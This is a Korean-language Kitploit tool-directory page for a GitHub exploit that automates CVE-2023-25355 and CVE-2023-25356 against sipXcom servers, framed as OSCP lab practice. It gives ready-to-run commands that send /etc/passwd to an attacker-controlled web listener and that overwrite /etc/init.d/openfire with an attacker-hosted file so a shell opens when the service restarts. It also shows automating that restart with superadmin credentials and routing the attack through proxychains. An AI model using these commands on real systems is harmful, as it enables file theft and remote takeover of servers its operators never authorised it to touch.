Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-25355-25356 — CVE-2023-25355 및 CVE-2023-25356, 자동 서비스 재로드 포함 | Kitploit
도구/GitHubGitHub/glefait/cve-2023-25355-25356
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubglefait/cve-2023-25355-25356

CVE-2023-25355-25356

CVE-2023-25355 및 CVE-2023-25356, 자동 서비스 재로드 포함

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Exploit and credits

이 익스플로잇은 [email protected]에 의해 발견되었으며, 두 가지 훌륭한 자료로 제시되었습니다:

  • full disclosure article
  • DEFCON31 slides

이 취약점을 더욱 자동화하는 저장소가 Alex Linov에 의해 게시되었습니다:

  • https://github.com/AlexLinov/sipXcom-RCE

Objective

CVE-2023-25355는 sipXcom 서버의 파일이 공격자가 제어하는 웹 서버에 업로드되는 유출 메커니즘입니다.

CVE-2023-25356은 첫 번째 취약점의 확장으로, 공격자가 제어하는 파일을 sipXcom 서버 파일 시스템에 쓸 수 있습니다. sipXcom 서비스가 자체 init 구성을 덮어쓸 수 있기 때문에, 서비스가 재시작되면 쉽게 셸을 얻을 수 있습니다.

여기서 주목할 흥미로운 점은 sipXcom 슈퍼관리자 사용자가 이 서비스를 재시작할 수 있다는 것입니다. 따라서 이 패키지의 목표는 이 서비스의 재시작을 완전히 자동화하는 것입니다.

but why fully automating it ?

OSCP를 준비하기 위해, 해킹할 머신이 있는 랩이 있습니다. 특정 랩에서는 이 취약점에 노출된 머신이 상당히 불안정하여, 때로는 랩을 여러 번 시작하고 되돌려야 했습니다. 이것은 성가신 일입니다. 자동화되면 덜 성가십니다.

Requirements

다음이 필요합니다:

  • 대상에서 접근 가능하며 파일을 제공하거나 수신할 수 있는 웹 서버.
  • python 및 poetry

Usage

Install

root@kitploit:~
poetry install

그런 다음 활성화된 환경에서 도구를 실행하거나, 디렉터리에서 또는 다른 곳에서 CVE 이름으로 실행할 수 있습니다:

root@kitploit:~
# if the poetry environment is active (poetry shell)
cve_2023_25355 --help

# otherwise, from the current directory
poetry run cve_2023_25355 --help

# otherwise from another directory
poetry -C /shared/tools/CVE/CVE-2023-25355 run cve_2023_25355 --help

CVE-2023-25355

다음 예제에서는 공격자가 제어하는 HTTP 리스너에 업로드될 /etc/passwd 파일을 유출하는 페이로드를 전송합니다.

root@kitploit:~
cve_2023_25355 \
    --xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
    --xmpp-server-address 1.2.3.4 \
    --payload '--data-binary @/etc/passwd http://ATTACKER-WEB-LISTENER/some_path'

CVE-2023-25356

다음 예제에서는 제공된 URI의 내용으로 /etc/init.d/openfire를 덮어쓰는 페이로드를 전송합니다.

root@kitploit:~
cve_2023_25356 \
    --xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
    --xmpp-server-address 1.2.3.4 \
    --sipxcom-init-file-source-uri 'http://ATTACKER-WEB-LISTENER/my-offensive-sipx-config'

그런 다음 슈퍼관리자 비밀번호를 알고 있다면, 서비스를 재시작하여 구성을 다시 로드하고 가젯을 트리거할 수 있습니다.

root@kitploit:~
run sipxcom_service_restart \
    --sipxcom-superuser-username superadmin \
    --sipxcom-superuser-password superadmin_password \
    --sipxcom-website https://1.2.3.4/
    --debug-local-directory /tmp

proxychains와 함께 사용

root@kitploit:~
./proxychains4 -f proxychains.conf cve_2023_25355 [...] --xmpp-server-address 172.1.2.3

Project:

  • https://github.com/rofl0r/proxychains-ng
도구 다운로드